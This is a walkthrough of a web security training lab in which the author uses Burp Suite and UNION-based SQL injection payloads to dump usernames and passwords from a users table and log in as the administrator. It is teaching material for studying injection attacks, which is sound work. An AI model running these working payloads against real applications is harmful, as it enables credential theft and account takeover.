Lab: SQL injection UNION attack, retrieving multiple values in a single column
This lab contains a SQL injection vulnerability in the product category filter. The results from the query are returned in the application’s response so you can use a UNION attack to retrieve data from other tables.
The database contains a different table called users, with columns called username and password.
To solve the lab, perform a SQL injection UNION attack that retrieves all usernames and passwords, and use the information to log in as the administrator user.
Very similar to the previous Lab, this is what the landing page of the lab looks like.
We know there’s a SQL injection vulnerability in the product category filter. Before we select a category, I clicked on intercept on button on Burp Suite, then selected the Pets category.
Send this request we intercepted to Burp Suite Repeater because we would need to send requests and receive response multiple times to figure out the vulnerability and exploit it.
' UNION SELECT NULL, NULL, NULL, NULL from users--. Starting with 4 NULLs as the placeholders to test whether the original query has 4 columns from the users table. However, before we run it for a test, we need to apply URL encoding on this query.
URL encoding applied
4 NULLs, and 3 NULLs returned 500 Internal Server Error status code.
When the number of NULL placeholders got cut down to 2, it finally returned status code 200
replaced the first NULL placeholder with a string value 'A', didn’t work out. This indicates that the first column expects a different data type value, not a String data type.
replaced the second NULL with the same string data type value, and it worked. As you can see, we got the status code 200 as our response.
Then, our SQL query became the following:
' UNION SELECT NULL, username||password from users--
We need both username and password values and we know the first column isn’t much useful because it doesn’t expect a string data type. Therefore, we concatenated the username column and password column, combining tow values into a single output column.
If you see what’s returned on the right, it’s hard to distinguish between the username and password because they’re concatenated without any separator.
Therefore, I added --- as a separator between the username and password. The final query is as follows:
' UNION SELECT NULL, username||'---'||password from users--
Of course, you would need to apply URL encoding on the query if you need to pass this query in a URL as I did.
Type in the credentials I just obtained from the query.
BAM!